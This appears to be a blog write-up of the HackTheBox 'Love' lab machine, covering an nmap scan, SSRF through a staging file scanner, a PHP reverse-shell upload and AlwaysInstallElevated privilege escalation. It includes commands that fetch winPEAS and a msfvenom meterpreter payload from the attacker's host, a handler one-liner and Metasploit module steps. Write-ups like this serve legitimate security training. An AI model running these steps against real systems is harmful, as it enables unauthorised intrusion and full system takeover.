LOVE HACKTHEBOX DETAILED WRITEUP

Image

 

 Nmap Scan

 PORT   STATE SERVICE   VERSION  
 80/tcp  open http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)  
 | http-cookie-flags:   
 |  /:   
 |   PHPSESSID:   
 |_   httponly flag not set  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27  
 |_http-title: Voting System using PHP  
 135/tcp open msrpc    Microsoft Windows RPC  
 139/tcp open netbios-ssn Microsoft Windows netbios-ssn  
 443/tcp open ssl/http   Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)  
 |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27  
 |_http-title: 403 Forbidden  
 | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in  
 | Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in  
 | Public Key type: rsa  
 | Public Key bits: 2048  
 | Signature Algorithm: sha256WithRSAEncryption  
 | Not valid before: 2021-01-18T14:00:16  
 | Not valid after: 2022-01-18T14:00:16  
 | MD5:  bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6  
 |_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2  
 |_ssl-date: TLS randomness does not represent time  
 | tls-alpn:   
 |_ http/1.1  
 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)  
 3306/tcp open mysql?  
 | fingerprint-strings:   
 |  TLSSessionReq:   
 |_  Host '10.10.14.7' is not allowed to connect to this MariaDB server  
 5000/tcp open http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)  
 |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27  
 |_http-title: 403 Forbidden  
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :  
 SF-Port3306-TCP:V=7.91%I=7%D=5/2%Time=608E1783%P=x86_64-pc-linux-gnu%r(TLS  
 SF:SessionReq,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.7'\x20is\x20not\x  
 SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");  
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).  
 TCP/IP fingerprint:  
 OS:SCAN(V=7.91%E=4%D=5/2%OT=80%CT=1%CU=37207%PV=Y%DS=2%DC=T%G=Y%TM=608E17CB  
 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10F%TI=I%CI=I%II=I%SS=O%TS=U)  
 OS:SEQ(SP=FA%GCD=1%ISR=10F%CI=I%II=I%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O  
 OS:3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=  
 OS:FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%  
 OS:Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F  
 OS:=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%  
 OS:T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD  
 OS:=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S  
 OS:=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK  
 OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)  
 Network Distance: 2 hops  
 TCP Sequence Prediction: Difficulty=250 (Good luck!)  
 IP ID Sequence Generation: Incremental  
 Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows  
 Host script results:  
 |_clock-skew: mean: 2h42m14s, deviation: 4h02m30s, median: 22m13s  
 | smb-os-discovery:   
 |  OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)  
 |  OS CPE: cpe:/o:microsoft:windows_10::-  
 |  Computer name: Love  
 |  NetBIOS computer name: LOVE\x00  
 |  Workgroup: WORKGROUP\x00  
 |_ System time: 2021-05-01T20:30:44-07:00  
 | smb-security-mode:   
 |  account_used: <blank>  
 |  authentication_level: user  
 |  challenge_response: supported  
 |_ message_signing: disabled (dangerous, but default)  
 | smb2-security-mode:   
 |  2.02:   
 |_  Message signing enabled but not required  
 | smb2-time:   
 |  date: 2021-05-02T03:30:48  
 |_ start_date: N/A  


Enumeration


subdomain Founded(staging.love.htb)


Port 80 Love.htb


 

A login page , i tried Default credentials and some basic sql injections but it's not work

 

so lets visit subdomain 

staging.love.htb


 

file scanner? ok lets put our reverseshell in this file scanner to get reverseshell but

i tried but its not work




i didn't get back shell


After analyzing nmap result i find port 5000(unusual-port) is opened

but its 403 forbidden



so we use file scanner(http://staging.love.htb/beta.php) to access port 5000

Booom!! We got admin creds of love.htb/admin



We are now Admin


INTIAL SHELL

lots way to get reverse-shell i'm upload my shell in profile photo , you can also upload voter candidate,voter lis etc...

Make sure , its windows machine so usual linux (php)shell doesn't work so i use

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/minified/php_reverse_shell_mini.php this shell or you can use nishang shell also


Steps to upload shelll




cool :)

USER.TXT


Privilege escalation


Transfer Winpeas.exe to victim machine to analayze (simple powershell one liner code)

 

 Invoke-WebRequest "http://10.10.14.4/winPEAS.exe" -OutFile winpeas.exe  

 

  

.\winpeas.exe
 
AlwaysInstallElevated its enabled?


What is this?

As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. These MSI packages can be installed with elevated privileges for non-admin users

For this purpose, the AlwaysInstallElevated policy feature is used to install an MSI package file with elevated (system) privileges. This policy is enabled in the Local Group Policy editor; directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This method can make a machine vulnerable posing a high-security risk because a non-administrator user can run installations with elevated privileges and access many secure locations on the computer.

Caution Note: This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting. Hence this should be used for the lab purposes only (and not in a Production environment) (source)

ROOT.TXT

STEPS TO BECOME ADMINISTRATOR

 

first we need meterpreter shell, so lets first create msfvenom payload then transfer to victim machine to get meterpreter session 

 (command)

 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=9001 -f exe -o reverse.exe  

 

 then upload the payload via python server


 (listener command)
 Invoke-WebRequest "http://10.10.14.8:8000/reverse.exe" -OutFile reverse.exe  

 (Then start msfconsole listner)

 msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.8; set lport 9001; exploit"  

trigger the shell .\



In order to perform the Privilege escalation abusing the AlwaysInstalledElevated policy, we can use utilize the inbuilt exploit of the Metasploit module as follows :


Then,

 use exploit/windows/local/always_install_elevated  
 msf exploit(always_install_elevated) > set session 1  
 msf exploit(always_install_elevated) > set lhost <your tun0ip>  
 msf exploit(always_install_elevated) > exploit  

 


 

 

Hurrah!! We have rooted in the Love Machine (NT AUTHORITY\SYSTEM) which has the highest level of privileges on the local system



 

LOVE PWNED :)

L for Lateral

O for Offensive

V for Vulnerability

E for Escalation

Post a Comment

أحدث أقدم

Smartphones

Post ADS 1

Advertisement

Post ADS 1